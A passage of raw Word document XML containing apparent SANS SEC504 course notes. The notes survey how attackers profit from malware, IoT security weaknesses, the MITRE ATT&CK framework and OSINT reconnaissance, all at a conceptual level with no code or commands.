                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attackers are figuring out how to make money from their malicious code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1EEFE9" w14:textId="77777777" w:rsidR="00375787" w:rsidRDefault="00375787" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ask law enforcement: If there’s money in a given crime, we’ll see much more of it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06614ED2" w14:textId="77777777" w:rsidR="00375787" w:rsidRDefault="00375787" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>How to make money on malicious code:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A1097F"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Cryptocurrency miners</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06955065"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Spam and web-based advertising</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319E1BF8"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Phishing: Email, phone, and targeted (spear) phishing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B871609"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Denial-of-service extorsion.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4308BE66"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Keystroke loggers stealing financial information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632C65B0"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Rent out armies of infected systems for all the above.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED9F5FA"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Ram scrapers pulling CC numbers from POS terminals.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1732BA69" w14:textId="050FEE17" w:rsidR="00375787" w:rsidRPr="006F5A04" w:rsidRDefault="00375787" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ransomware.</w:t>
            </w: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407E04A2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="00B110BA" w:rsidRDefault="008E274D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B110BA">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Internet of things devices are widespread in the home and in the enterprise.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F1A6BD2" w14:textId="720E4987" w:rsidR="008E274D" w:rsidRPr="00B110BA" w:rsidRDefault="008E274D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B110BA">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Price compe</w:t>
            </w:r>
            <w:r w:rsidR="00B110BA" w:rsidRPr="00B110BA">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tition between vendors and short time-to-market development cycles often produces lackluster security features.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BAC6327" w14:textId="6C53E42C" w:rsidR="00B110BA" w:rsidRPr="00B110BA" w:rsidRDefault="00B110BA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B110BA">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Product adoption continues with little ability to manage devices on a large scale.</w:t>
            </w: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5948A861" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00B110BA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attackers are growing in sophistication but so are defenders.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A49A1AD" w14:textId="2B0CCCD0" w:rsidR="00B110BA" w:rsidRPr="006F5A04" w:rsidRDefault="00B110BA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>More scientific and precise approaches to defense, costly breaches</w:t>
            </w:r>
            <w:r w:rsidR="003254FD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> have produced top-level support for infosec skills. Knowing systems and networking is good and adding infosec skills differentiates you from your peers.</w:t>
            </w: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48B90B02" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00D32187" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Is a not -for-profit US company managing technical Federally Funday Research and Development Centers (FFRDCs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B9994B" w14:textId="77777777" w:rsidR="00D32187" w:rsidRDefault="00D32187" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ATT&amp;CK Framework is a knowledge base, mapping adversary tactics, techniques, and procedure (TTPs), based on real-world observations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029174DF" w14:textId="7B9787B5" w:rsidR="00D32187" w:rsidRPr="006F5A04" w:rsidRDefault="00D32187" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ATT&amp;CK integrates a common nomenclature for attacks.</w:t>
            </w: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63853110"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02ED5104" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00D32187" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker TTPs are complex and difficult to characterize comprehensively. ATT&amp;</w:t>
            </w:r>
            <w:r w:rsidR="00906ACB">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CK provides</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> an easy framework to characterize and cross-reference attack techniques to gain better insight into how attackers operate, and how to defend networks</w:t>
            </w:r>
            <w:r w:rsidR="00906ACB">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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0F2B08F2"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15D04AEC" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2B7C30" w14:textId="6FA1B9DF" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="005E1048" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Enterprise Matrix)</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520A243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6B5B52">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B5B52" w:rsidRPr="006F5A04" w14:paraId="64DCB9D9" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060A9385" w14:textId="29D3A499" w:rsidR="006B5B52" w:rsidRPr="006F5A04" w:rsidRDefault="006B5B52" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>How we integrate SEC504 with ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D4D223" w14:textId="77777777" w:rsidR="006B5B52" w:rsidRDefault="008E5783" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Content is normalized using the nomenclature conventions adopted by ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E794800" w14:textId="623F2F8B" w:rsidR="008E5783" w:rsidRPr="00703C67" w:rsidRDefault="008E5783" w:rsidP="00703C67">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00703C67">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>This gives you a consistent framework to work from when describing documenting, and discussing attacker tactics, techniques, and procedures.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4015B4D8" w14:textId="35F9D601" w:rsidR="008E5783" w:rsidRDefault="008E5783" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cross-reference tools and techniques with ATT&amp;CK identifiers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A0C364" w14:textId="77777777" w:rsidR="00703C67" w:rsidRPr="00703C67" w:rsidRDefault="008E5783">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00703C67">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Let’s talk about password spray attacks</w:t>
            </w:r>
            <w:r w:rsidR="00703C67" w:rsidRPr="00703C67">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (credential Access: TA0006) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C792A97" w14:textId="54B04054" w:rsidR="008E5783" w:rsidRPr="00703C67" w:rsidRDefault="00703C67">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00703C67">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>“Donut injects shellcode into existing assemblies and payloads” (Process Injection: T1055)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC9FADB" w14:textId="3030A17F" w:rsidR="00703C67" w:rsidRPr="006F5A04" w:rsidRDefault="00703C67" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Validation for attack tool and defense realism.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A97D7A" w14:textId="375E57D3" w:rsidR="006B5B52" w:rsidRPr="006F5A04" w:rsidRDefault="006B5B52" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523F6399" w14:textId="1CC935EC" w:rsidR="006B5B52" w:rsidRPr="006F5A04" w:rsidRDefault="006B5B52"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2BD4F218" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00B621F4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack techniques and tactics are categorized with the MITRE ATTACK Id in the top right. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DEC3161" w14:textId="6F713839" w:rsidR="00B621F4" w:rsidRPr="006F5A04" w:rsidRDefault="00B621F4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Notes pages provide reference links for techniques and tools.</w:t>
            </w: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5B9095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557695">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5</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6C67DDB2" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00256052" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OSINT</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24CA4ACB" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00256052" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>17</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1801C90" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="007E653E" w:rsidP="00256052">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidR="008B62FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>internet is a treasure trove of information for a curious attacker.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513A4F64" w14:textId="5896B6AF" w:rsidR="003A28B0" w:rsidRDefault="003A28B0" w:rsidP="00256052">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Reconnaissance is building intel, looking for opportunities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="633DB0E2" w14:textId="3ADE4860" w:rsidR="003A28B0" w:rsidRDefault="003A28B0" w:rsidP="00256052">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Two general types of attackers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D2129E" w14:textId="2178DFE1" w:rsidR="003A28B0" w:rsidRPr="003A28B0" w:rsidRDefault="003A28B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A28B0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Non discriminating attackers: Look for low-hanging fruit, and my skip this step (musabetsu-kougeki)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00309617" w14:textId="06E8A591" w:rsidR="003A28B0" w:rsidRPr="003A28B0" w:rsidRDefault="003A28B0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A28B0">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Attackers out to get a particular site: this step is extremely important.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AB8C23" w14:textId="7294D32B" w:rsidR="003A28B0" w:rsidRDefault="003A28B0" w:rsidP="00256052">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Helpful step for experience attackers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A81376" w14:textId="3F915A81" w:rsidR="008B62FE" w:rsidRPr="007E653E" w:rsidRDefault="003A28B0" w:rsidP="00256052">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
              </w:rPr>
              <w:t>Reconnaissance usually begins with OSINT collection.</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9ECE630" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="003A28B0" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>17</w:t>
            </w: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0A0E1C75" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="009B583F" w:rsidRDefault="0054631F" w:rsidP="009B583F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B583F">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Before sending your first packet to a target, you should collect OSINT data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DC7E2F" w14:textId="77777777" w:rsidR="0054631F" w:rsidRPr="004D40B3" w:rsidRDefault="0054631F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>All organizations have lots of data online.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6AF7E9" w14:textId="77777777" w:rsidR="0054631F" w:rsidRPr="004D40B3" w:rsidRDefault="0054631F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Planned sharing: Hacke</w:t>
            </w:r>
            <w:r w:rsidR="009B583F" w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> email addresses for</w:t>
            </w:r>
            <w:r w:rsidR="009B583F" w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> third party websites, employee social media content, website certificate details, internal servicer links, public forum data, document</w:t>
            </w:r>
            <w:r w:rsidR="007E0C6E" w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009B583F" w:rsidRPr="004D40B3">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
